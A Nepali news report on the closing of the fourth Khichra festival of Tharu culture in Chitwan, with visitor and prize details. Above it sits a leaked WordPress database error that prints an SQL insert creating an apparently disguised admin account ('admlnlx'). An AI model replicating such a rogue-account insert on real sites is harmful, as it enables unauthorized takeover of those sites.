WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLaMRGHekgnwTmf1aE.yYay5kaDbAE.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 18:19:32', '', 'admlnlx', 'admlnlx')
चितवन , माघ ६ –
पूर्वी चितवनको खैरहनीमा जारी चौंथो खिचरा महोत्सव बुधवारबाट सकिएको छ । थारु समुदायको कला, संस्कृति, रितिरिवाज र परम्परा जर्गेना गर्ने उद्देश्यले थारु कल्याणकारीणी सभा क्षेत्र नम्बर ७ ले पुष २८ गतेबाट संचालन गरेको महोत्सव आज समापन भएको हो । राष्ट्रिय एकता र विविधता हाम्रो शान, बहुजाति, भाषा, संस्कृति नेपालको पहिचान भन्ने नारा सहित आयोजित महोत्सवमा थारु समुदायका सांस्कृति पहिचान झल्कने मिनी संग्रहालय, थारु नृत्य, कृषि उपज प्रदर्शनी, थारु परिकार, आदि आकर्षणको रुपमा रहेका थिए । युवा पुस्तालाई थारु संस्कृति तर्फ आकर्षित गर्न, थारु भाषा, संस्कृतिको संरक्षण र आन्तरिक पर्यटन तथा व्यापार व्यवसायको प्रवद्र्धन गर्न विगत ३ वर्षदेखी महोत्सव सञ्चालन हुंदै आइरहेको छ ।

महोत्सवको समापन चितवनका प्रमुख जिल्ला अधिकारी नारायण प्रसाद भट्टले गरेका हुन् । करिब एक लाख दर्शकले महोत्सव अवलोकन गरेको र करिब २५ लाखको कारोबार भएको मुल आयोजक कमिटीका संयोजक नारायण महत्तोले जानकारी दिए । महोत्सव अन्तर्गत भएको नृत्य प्रतियोगिताको नतिजा पनी आज सार्वजनिक गरिएको छ । प्रतियोगितामा आशिष चौधरी प्रथम , स्मृती भण्डारी द्धतिय र दिब्या नेपाल तृतिय भएकी छिन् । त्यस्तै सोनम चौधरी ,ज्योती चौधरी , वविता प्रजा , रिता प्रजा , प्रिया पुनमको जोडीले सान्त्वना पुरस्कार पाए । प्रथम , द्धितिय र तृतिय हुनेलाई क्रमश १० हजार, ७ हजार र ५ हजार रुपैया पुरस्कार स्वरुप प्रदान गरिएको र सान्त्वनाहरुलाई १ – १ हजार प्रदान गरिएको साँस्कृतिक संयोजक जयश चौधरीले जानकारी दिए । मुल आयोजक कमिटीका संयोजक नारायण प्रसाद महत्तोको अध्यक्षतामा भएको कार्याक्रममा महोत्सवका प्रचार प्रसार समितिका संयोजक सन्तकुमार चौधरीले स्वागत मन्तव्य राखेका थिए ।
